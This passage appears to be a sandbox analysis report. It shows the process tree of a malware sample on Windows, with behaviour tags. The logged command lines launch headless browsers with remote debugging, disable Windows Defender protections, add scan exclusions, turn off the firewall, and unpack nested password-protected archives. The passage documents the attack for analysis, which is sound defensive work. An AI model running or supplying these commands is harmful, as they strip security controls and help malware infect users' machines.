        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=4700,i,4212837604006277852,4410782281667388020,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4680 /prefetch:8
        10⤵
        
        PID:1532
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=3296,i,4212837604006277852,4410782281667388020,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4968 /prefetch:8
        10⤵
        
        PID:7340
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=4848,i,4212837604006277852,4410782281667388020,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4800 /prefetch:8
        10⤵
        
        PID:544
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=5188,i,4212837604006277852,4410782281667388020,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5184 /prefetch:8
        10⤵
        
        PID:1344
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=4844,i,4212837604006277852,4410782281667388020,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5296 /prefetch:8
        10⤵
        
        PID:3888
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=4744,i,4212837604006277852,4410782281667388020,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4960 /prefetch:8
        10⤵
        
        PID:8100
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --no-appcompat-clear --remote-debugging-port=8936 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5304,i,4212837604006277852,4410782281667388020,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5372 /prefetch:2
        10⤵
        Uses browser remote debugging
        
        PID:5864
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session --remote-debugging-port=8145 --remote-allow-origins=* --headless=new "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data"
        9⤵
        Uses browser remote debugging
        
        PID:180
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd7a546f8,0x7fffd7a54708,0x7fffd7a54718
        10⤵
        
        PID:3576
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1504,3195342668762214445,10320542113853130882,131072 --disable-features=PaintHolding --headless=new --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1512 /prefetch:2
        10⤵
        
        PID:5396
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1504,3195342668762214445,10320542113853130882,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1848 /prefetch:3
        10⤵
        
        PID:1092
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=8145 --allow-pre-commit-input --field-trial-handle=1504,3195342668762214445,10320542113853130882,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1964 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:1044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
        9⤵
        
        PID:3500
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM msedge.exe
        10⤵
        Kills process with taskkill
        
        PID:660
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        9⤵
        
        PID:2972
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        10⤵
        Kills process with taskkill
        
        PID:4352
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session --remote-debugging-port=8657 --remote-allow-origins=* --headless=new "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data"
        9⤵
        Uses browser remote debugging
        
        PID:1528
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd78fcc40,0x7fffd78fcc4c,0x7fffd78fcc58
        10⤵
        
        PID:6876
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless=new --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2036,i,7543103468042073894,1930845106776543593,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2024 /prefetch:2
        10⤵
        
        PID:6064
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=1836,i,7543103468042073894,1930845106776543593,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:3
        10⤵
        
        PID:940
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=2176,i,7543103468042073894,1930845106776543593,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2568 /prefetch:8
        10⤵
        
        PID:5760
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8657 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3404,i,7543103468042073894,1930845106776543593,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3560 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:6380
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8657 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3488,i,7543103468042073894,1930845106776543593,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3728 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:6356
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8657 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4516,i,7543103468042073894,1930845106776543593,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4524 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:5392
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=4820,i,7543103468042073894,1930845106776543593,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4832 /prefetch:8
        10⤵
        
        PID:7996
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session --remote-debugging-port=8912 --remote-allow-origins=* --headless=new "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data"
        9⤵
        Uses browser remote debugging
        
        PID:6292
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffff125cc40,0x7ffff125cc4c,0x7ffff125cc58
        10⤵
        
        PID:5848
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless=new --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2032,i,8309460982516787907,14179586637170338996,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2028 /prefetch:2
        10⤵
        
        PID:6444
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=1892,i,8309460982516787907,14179586637170338996,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2172 /prefetch:3
        10⤵
        
        PID:6428
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=2300,i,8309460982516787907,14179586637170338996,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2320 /prefetch:8
        10⤵
        
        PID:6240
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8912 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3828,i,8309460982516787907,14179586637170338996,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3836 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:3088
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8912 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3844,i,8309460982516787907,14179586637170338996,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3992 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:5076
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8912 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4292,i,8309460982516787907,14179586637170338996,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4596 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:1144
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"
        5⤵
        
        PID:6848
      - C:\Windows\system32\wevtutil.exe
        
        wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6904
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg delete hkcu\Software\Classes\ms-settings /f"
        5⤵
        
        PID:6920
      - C:\Windows\system32\reg.exe
        
        reg delete hkcu\Software\Classes\ms-settings /f
        6⤵
        Modifies registry class
        Modifies registry key
        
        PID:6972
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -command Add-MpPreference -ExclusionExtension .exe"
        5⤵
        
        PID:7152
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Add-MpPreference -ExclusionExtension .exe
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:968
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -command Add-MpPreference -ExclusionExtension .tmp"
        5⤵
        
        PID:3572
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Add-MpPreference -ExclusionExtension .tmp
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5084
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -command Set-MpPreference -EnableControlledFolderAccess Disabled"
        5⤵
        
        PID:6424
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Set-MpPreference -EnableControlledFolderAccess Disabled
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:8044
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -command Set-MpPreference -PUAProtection disable"
        5⤵
        
        PID:8184
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Set-MpPreference -PUAProtection disable
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4276
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -command Add-MpPreference -ExclusionExtension .exe"
        5⤵
        
        PID:5824
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Add-MpPreference -ExclusionExtension .exe
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:7452
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -command Set-MpPreference -DisableBlockAtFirstSeen $true"
        5⤵
        
        PID:6088
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Set-MpPreference -DisableBlockAtFirstSeen $true
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:6480
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -command Set-MpPreference -DisableIOAVProtection $true"
        5⤵
        
        PID:6208
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Set-MpPreference -DisableIOAVProtection $true
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6508
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -command Set-MpPreference -DisablePrivacyMode $true"
        5⤵
        
        PID:4216
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Set-MpPreference -DisablePrivacyMode $true
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4940
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -command Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
        5⤵
        
        PID:6580
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6660
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -command Set-MpPreference -DisableArchiveScanning $true"
        5⤵
        
        PID:6744
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Set-MpPreference -DisableArchiveScanning $true
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7092
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -command Set-MpPreference -DisableIntrusionPreventionSystem $true"
        5⤵
        
        PID:4408
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Set-MpPreference -DisableIntrusionPreventionSystem $true
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4292
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -command Set-MpPreference -DisableScriptScanning $true"
        5⤵
        
        PID:2496
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Set-MpPreference -DisableScriptScanning $true
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7312
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -command Set-MpPreference -SubmitSamplesConsent 2"
        5⤵
        
        PID:3564
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Set-MpPreference -SubmitSamplesConsent 2
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7684
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -command Set-MpPreference -MAPSReporting 0"
        5⤵
        
        PID:4544
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Set-MpPreference -MAPSReporting 0
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1320
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -command Set-MpPreference -HighThreatDefaultAction 6 -Force"
        5⤵
        
        PID:7824
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Set-MpPreference -HighThreatDefaultAction 6 -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6248
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -command Set-MpPreference -LowThreatDefaultAction 6"
        5⤵
        
        PID:6568
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Set-MpPreference -LowThreatDefaultAction 6
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5892
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -command Set-MpPreference -SevereThreatDefaultAction 6"
        5⤵
        
        PID:6676
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Set-MpPreference -SevereThreatDefaultAction 6
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1520
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -command Set-MpPreference -ScanScheduleDay 8"
        5⤵
        
        PID:7100
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Set-MpPreference -ScanScheduleDay 8
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4384
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -command netsh advfirewall set allprofiles state off"
        5⤵
        
        PID:5268
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command netsh advfirewall set allprofiles state off
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5104
        
        C:\Windows\system32\netsh.exe
        
        "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:7436
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Maintenance Service', 0, 'Maintenance Service', 0+16);close()""
        5⤵
        
        PID:7196
      - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Maintenance Service', 0, 'Maintenance Service', 0+16);close()"
        6⤵
        
        PID:4320
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\firefox.exe"
        5⤵
        
        PID:4344
- - C:\Users\Admin\AppData\Local\Temp\1021160001\d99c45b302.exe
    "C:\Users\Admin\AppData\Local\Temp\1021160001\d99c45b302.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2564
  - - C:\Users\Admin\AppData\Local\Temp\1021160001\d99c45b302.exe
      "C:\Users\Admin\AppData\Local\Temp\1021160001\d99c45b302.exe"
      4⤵
      Executes dropped EXE
      PID:100
  - - C:\Users\Admin\AppData\Local\Temp\1021160001\d99c45b302.exe
      "C:\Users\Admin\AppData\Local\Temp\1021160001\d99c45b302.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3348
- - C:\Users\Admin\AppData\Local\Temp\1021161001\afa370d0bc.exe
    "C:\Users\Admin\AppData\Local\Temp\1021161001\afa370d0bc.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5440
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 1484
      4⤵
      Program crash
      PID:7280
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 1436
      4⤵
      Program crash
      PID:1636
- - C:\Users\Admin\AppData\Local\Temp\1021162001\5a0a0a9d4b.exe
    "C:\Users\Admin\AppData\Local\Temp\1021162001\5a0a0a9d4b.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3300
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
      4⤵
      PID:5192
    - - C:\Windows\system32\mode.com
        
        mode 65,10
        5⤵
        
        PID:1180
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e file.zip -p24291711423417250691697322505 -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:5292
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_7.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:5328
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_6.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:5396
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_5.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:5392
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_4.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:5460
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_3.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:396
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_2.zip -oextracted
        5⤵
        Executes dropped EXE
